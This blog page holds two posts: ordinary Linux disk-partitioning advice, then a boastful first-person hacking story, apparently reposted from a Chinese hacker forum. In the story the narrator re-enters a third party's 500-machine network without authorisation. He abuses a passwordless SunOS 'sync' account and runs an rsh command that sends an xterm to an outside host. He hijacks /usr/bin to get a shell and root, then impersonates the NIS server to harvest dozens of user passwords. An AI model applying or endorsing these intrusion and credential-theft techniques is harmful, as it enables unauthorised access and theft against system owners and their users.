2005年08月08日

在对硬盘进行分区前,应该先弄清楚计算机担负的工作及硬盘的容量有多大,还要考虑到以下几个问题。

  第一点也是最重要的一点,要知道当前安装LILO的版本,因为LILO2.21及早期版本对硬盘大小有限制,如果安装LILO到1023磁道以外即8G的空间以外,LILO就无法启动。 但一些BIOS较老的机器,LINUX仍然无法突破1024磁道的限制,因此这些BIOS无法认出大于1024的硬盘空间。

  还需要考虑的问题有:

  · 是否限制用户可使用的磁盘空间大小?

  · 在系统中需要安装哪些软件?

  · 交换分区需要多大?

  · 系统是否有多个硬盘?

  下面,我们按系统工作性质的不同对分区的划分提出了一些建议。当然,根据实际情况,在满足系统工作需求的前提下,下面的分区大小也可以灵活的变动。

基本工作站的分区方案
  假设系统的硬盘大小是10G。

  /boot 20M

  Swap 128M

  /root 9.85G

  建立一个20M的/boot分区是为了避免将系统内核文件放到1024磁道以外,如果将/boot做为root分区的一个子目录,内核文件就会安装在root分区的任何地方,因为硬盘的大小超过了8G,所以在启动时就有可能出现问题。建议将交换分区的大小设置为内存的两倍,在这里我们假设系统的内存为64M。最后我们将硬盘的剩余空间全部分给了root分区。

Red Hat Linux 6.2 及其早期版本上的基本服务器硬盘分区方案
  这里的服务器我们假设只提供几种通用的服务,如WWW服务及FTP服务等几种服务,通过telnet登录的用户数很少。假设其硬盘大小为25G。

  /boot 20M

  Swap 128M

  / 10G

  /home 13G

  /var 2G

  在硬盘的最前面创建20M大小的/boot分区,原因同上。交换分区的大小也是128M,因为内存的大小为64M。

  / ,即root分区设为10G这么大是因为其中有一个/usr目录,这个目录可能会占用很多硬盘空间,特别是在安装了X Server,运行图形界面的应用程序的时候。

  /home分区是硬盘中最大的分区,这似乎与我们假设系统用户数不多有些矛盾。实际上在/home目录下确实没有几个用户目录,但在Red Hat6.2及更早的版本中,Apache服务器和wu-ftpd FTP服务器被放在了/home/httpd及/home/ftp目录中。所以这个分区这么大也是有原因的。

  最后,/var目录独自占用了一个分区,因为系统的所有日志都写到了/var/log目录下,这将会占用很大的硬盘空间。如果系统日志记录得非常详细,整个目录很快会被写满,导致系统工作呆滞。当然,可以通过系统日志后台守护程序syslogd来修改日志配置,避免发生这种情况。

Red Hat 7及以上版本的基本服务器分区方案
  这种情况同前一个方案的情况相同,不同的是LINUX版本为Red Hat 7.0及其以上版本。

  /boot 20M

  Swap 128M

  / 10G

  /var 15G

  与RedHat6不同,在RedHat7中HTTP服务和FTP服务的目录现在位于 /var/www/ 和/var/ftp/,因此/var分区有15G之大也就不难理解了。

多用户服务器分区方案
  在这种服务器系统中,同时有多个用户通过telnet, ssh, rlogin或其方式在远程访问系统。系统中有三个35G的硬盘驱动器,总共有105G的磁盘空间 。系统中用到了RAID 5技术做数据冗余。这种情况下,管理员必须为每个用户分配磁盘空间。对RedHat 6.2及更早的版本,分区如下:

  Disk 1:

  /boot 20M

  / 4G

  /var 3GB

  /home 27.98G

  Disk 2:

  swap 20MB

  / 4GB

  /var 3GB

  /home 27.98GB

  Disk 3:

  swap 20MB

  / 4GB

  /var 3GB

  /home 27.98GB

  这样分区的原因:首先,Disk1上的20M /boot分区不属于任何RAID阵列,否则如果你将/boot放至RAID阵列中,以后就不能系统内核升级了。

  为了方便管理,在其它两个硬盘中建立了20M的交换分区。这种服务器一般配有1G以上的内存,因此交换分区的大小不成问题。如果增大交换分区,就会减少RAID分区空间,所以20M是足够的。RAID分区的分组如下:

  · 1-A, 2-A, and 3-A 一起组成一个8G的 RAID 5 驱动器,做为/根目录打开。

  · 1-B, 2-B, and 3-B 组成 6GB的 RAID 5 驱动器,做为 /var目录。

  · 1-C, 2-C, and 3-C 组成 55.96GB RAID 5 驱动器, 做为 /home.目录。

  这种分配方案总共有55.96G的空间分配给所有用户及Apache和FTP服务,在/var下用6G空间用做记录日志、邮件,这么大的空间是足够的。

  如果安装Red Hat7或以上版本,应给/var分区更大的空间,因为它同时还存放着WEB和FTP服务的两个目录。

2005年08月01日

 来源:黑基论坛

无聊,上网逛逛,想起某地我还有一个网络有OpenVMS 7.5,半年没玩儿了,过去瞧瞧。

一瞧,顿然觉得失败,半年没见,那边的Admin竟然重新  
对所有机器进行了安全加强配置,而我当年竟然一时心软,没留一个隐蔽一点的后门 — 连shadow都没拉回来 — 失败,太失败了。

不甘心哪,我的500台大机 — AIX,HP-UX,Tru64,Irix还有变态西西的VMS…

实在是不甘心,我一定要再拿回来!

好吧,开始扫描,再看看它有什么漏洞。

========================================================================

所有的机器都是用nis集中认证,用户home也都是nfs的,每种平台都坚持最少服务原则,开放的服务也都打了补丁的…呜呜呜,看来是没漏洞了吗?

试,试试试,再试!

没用,所有的远程溢出都没用,只有一台机器开了Finger,结果还告诉我:你的地址已被记录在案 — 晕倒。

好吧,忽然,发现一台粉老粉老的东东,keep?
竟然是Sun OS 4.13,呵呵,拿来做留念的啊?
这台也是NFS服务器之一,showmount一下,竟然有两百多台机器nfs在这里。

服务开放:22,110,512,513,6000没了…

看来没希望啦?
老机有老机的应付方法,某些老系统可是存在一个却省账号 — sync的哦。
而且很多系统中这个账号都是没有passwd的!好吧,就这么办。

ssh连接,试探一下,OK!果然没有密码…可惜,也没有shell :_<
sync账号的却省shell当然就是sync了嘛!

好像还是没有用。
ssh不行,咱们rlogin再试试看…不行,还是不行…

进不去?那咱们就让他出来…
rsh -l sync keep \"/usr/openwin/bin/xterm -display xfocus.com:0\"

不行,好像是超时,再试,还是不行,看来是做了某些设置了…又失败。

快绝望了…呜呜呜…Quack哪,再给我多一点点…

忽然间,从眼泪中看到了灵光一闪!能X?那我当然也能X进去啦。

Ok,xdmcp,query,连接…失败…还是不行那…
这回真的绝望了…睡觉去。

========================================================================

一觉醒来,到别的机器上看看,X登录到了两台机器,忽然之间灵机一动 — 如果一台机器同时有几台机器Xdmcp的话,那X屏幕号就不是0了!而我的X一直设的:0!

改成:9,继续登录,几秒钟停顿之后,终于出现了激动人心的OpenWindow登录界面!激动呀!真的好激动!user:sync  pass:<null>,进去了!

几分钟之后,心情又从激动变成了空虚…
为什么上天对我如此的不公…那个弱智root,sync账号的xinitrc竟然有错误,我不但不能得到一个却省的xterm,而且能够运行的程序还只有两个 — xedit和文件管理器 — 没有一个shell,还是一切都等于0.

算了,这种情况也不是没有遇见过,至少sync还是和root同组的嘛,四处逛逛,要是它哪个文件权限设错,哪就,嘿嘿嘿嘿~~~

/.rhosts,读都不能读;/.xxxrc,都是只读;/…..没了
/etc,继续检查,发现hosts.allow,倒是我这个组可写,可惜修改了也没什么用…
/etc/passwd倒是可以看,可惜我不报多大希望crack它的…这边的密码强度我是早见识过 — 除非是8位以上的穷举…

看来是没办法了…无意之间,逛到了/usr,幸运之神再一次降临到了我的脚下,哈哈,/usr -rwxrwxr–!

算你倒霉,竟然/usr属于我这个组,而且同组可写!虽然bin我不能修改…
好吧,冒一次险,我mv /usr/bin!

没有shell真的好痛苦呀,我还得忍受奇慢无比的X……点一下鼠标它要10分钟才能反应过来 — 不愧是古董级得机器!

慢慢的,在文件管理其中执行了如下操作:
mv /usr/bin /usr/binn
mkdir /usr/bin
然后写了一个脚本,叫做sync,里面有一条命令,xterm什么的……嘿嘿嘿

哪边再登录一次… God!报错!/bin/login not found.
我竟然犯了那么危险的一个错误!
忘了这一点…好险,好吧,
mv /usr/bin/sync /usr/bin/login

再登录……终于,我这边的X缓慢的出现了一个term…松了一口气。
赶快把/usr/binn改回去,一面有人登录就麻烦了。

既然有了一个shell,后面就都简单了,从SunOS古老的漏洞中随便选几个出来,i am root!

既然是nis,su某用户就可以通行无阻啦!俺是良民嘛!

========================================================================
接下来的几天里,就是拿着良民证到处看看,最后选定一台HP-UX作为基地,用俺的独家利器得到了root,先备份回整个NIS数据库;然后让真正的NIS Server睡一会会儿觉,我就暂时替他看着,这一会儿嘛,当然会有很多用户到我这儿来报道啦,密码一个个等级好,差不多五六十个了。叫醒nis,我睡觉去了。

虽然只有五六十个普通用户,但是可是有500台各种平台的机器玩啊,俺又没那么黑,非要各个都是root.

重在学习嘛!